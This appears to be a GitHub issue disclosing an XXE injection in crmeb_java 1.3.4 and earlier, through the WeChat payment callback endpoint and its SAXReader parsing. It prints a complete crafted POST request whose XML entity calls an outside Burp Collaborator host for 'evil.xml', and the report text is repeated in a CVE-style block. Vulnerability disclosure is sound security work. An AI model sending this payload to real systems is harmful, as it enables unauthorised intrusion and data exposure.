You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Vulnerability details]
Send the crafted request package to the api interface /api/admin/payment/callback/wechat
POST /api/admin/payment/callback/wechat HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateAuthori-zation: dbdd777e27b94979adf06fc3fd20ee68Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteContent-Type: application/xmlContent-Length: 239<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://3qurglf920zqknzhgryal9ip7gd61v.burpcollaborator.net/evil.xml" >]><return_code>&xxe;</return_code><return_msg><![CDATA[OK]]></return_msg>
[Impact Code execution]
true
[Cause of vulnerability]
The interface /api/admin/payment/callback/wechat calls the function weChat
If the xmlInfo is not blank, the function processResponseXml will be called.
Then it calls the function xmlToMap to process the xml.
There is a XXE Injection vulnerability with the SAXReader component.
That's all, thanks.
The text was updated successfully, but these errors were encountered:
[Suggested description]
There is a XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SaxReader component.
[Vulnerability Type]
XML External Entity (XXE) Injection
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
/api/admin/payment/callback/wechat
[Attack Type]
Remote
[Vulnerability details]
Send the crafted request package to the api interface
/api/admin/payment/callback/wechat
[Impact Code execution]
true
[Cause of vulnerability]
The interface
/api/admin/payment/callback/wechat
calls the functionweChat
If the xmlInfo is not blank, the function
processResponseXml
will be called.Then it calls the function
xmlToMap
to process the xml.There is a XXE Injection vulnerability with the
SAXReader
component.That's all, thanks.
The text was updated successfully, but these errors were encountered: